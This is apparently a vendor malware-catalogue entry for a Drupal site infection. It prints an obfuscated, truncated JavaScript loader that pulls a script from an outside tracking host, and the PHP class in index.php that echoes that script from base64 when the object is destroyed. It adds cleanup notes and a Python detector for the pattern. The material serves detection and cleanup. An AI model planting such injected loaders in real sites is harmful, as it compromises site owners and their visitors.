
Malware entry: malware.injection.32

Description:

Injection of an obfuscated script from hxxps://track.amishbrand[.]com/s_code.js?...

Typical sample

<script>
;(​function(){var x=navigator[m("4t}​n)e}gnA(r;eistu}")];var y=document[m(":e}idk​,owodc,")];​if(s(x,m("0s7w)​obd)n)i(W{"))&​&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('​script');b.type='text/javascript';b.async=true;b.​src=m('b2)...skipped...o.parentNode.​insertBefore(b,o);}}function m(v){var ...skipped...{var k='';for(var p=​t.length-1;p>=0;p-​-){k+​=t[p];}return k;}​})();
</script>

Cleanup

This malware can be injected into index.php files of Drupal sites in the form of the following PHP code, which needs to be removed to clean the site.

<?php
	
class SoFooterClass{
	
	public $data = 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0d...skipped...ZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';
   
	public function __destruct(){
		
		echo base64_decode($​this-​>data);
		
	}
	
}

$​sofooter = new SoFooterClass();
	
?>
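
An added example, not part of the original entry or the vendor's tooling: a Python heuristic that flags index.php files matching the injection pattern shown above (a destructor that echoes base64_decode() output, or a long base64 literal that decodes to a <script> tag). The regexes, the 40-character threshold and the function names are assumptions made for this sketch; treat hits as leads for manual review.

```python
import base64
import binascii
import re
import sys
from pathlib import Path

# Assumption: quoted literal of 40+ base64 characters (threshold chosen for this sketch).
B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/]{40,}={0,2})\1""")
# Assumption: a destructor that echoes base64-decoded data, as in the sample above.
DESTRUCT_ECHO = re.compile(
    r"function\s+__destruct\s*\([^)]*\)\s*\{[^}]*echo\s+base64_decode\s*\(", re.I)
# Zero-width characters that can hide tokens from a plain grep; removed before matching.
ZERO_WIDTH = dict.fromkeys(map(ord, "\u200b\u200c\u200d\ufeff"))

def decodes_to_script(literal):
    """True if the base64 literal decodes to bytes containing a <script tag."""
    try:
        raw = base64.b64decode(literal + "=" * (-len(literal) % 4))
    except (binascii.Error, ValueError):
        return False
    return b"<script" in raw.lower()

def scan_php_source(text):
    """Return a list of findings for one PHP source string."""
    text = text.translate(ZERO_WIDTH)
    findings = []
    if DESTRUCT_ECHO.search(text):
        findings.append("destructor echoes base64_decode() output")
    for m in B64_LITERAL.finditer(text):
        if decodes_to_script(m.group(2)):
            line = text.count("\n", 0, m.start()) + 1
            findings.append(f"line {line}: base64 literal decodes to <script>")
    return findings

def scan_tree(root):
    """Scan every index.php under root; return {path: findings} for hits only."""
    hits = {}
    for path in Path(root).rglob("index.php"):
        found = scan_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for finding in found:
            print(f"{path}: {finding}")
```

Run it with the Drupal docroot as the only argument. A clean tree produces no output.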


Affecting: Drupal.

Mitigation: How to clean a hacked Drupal site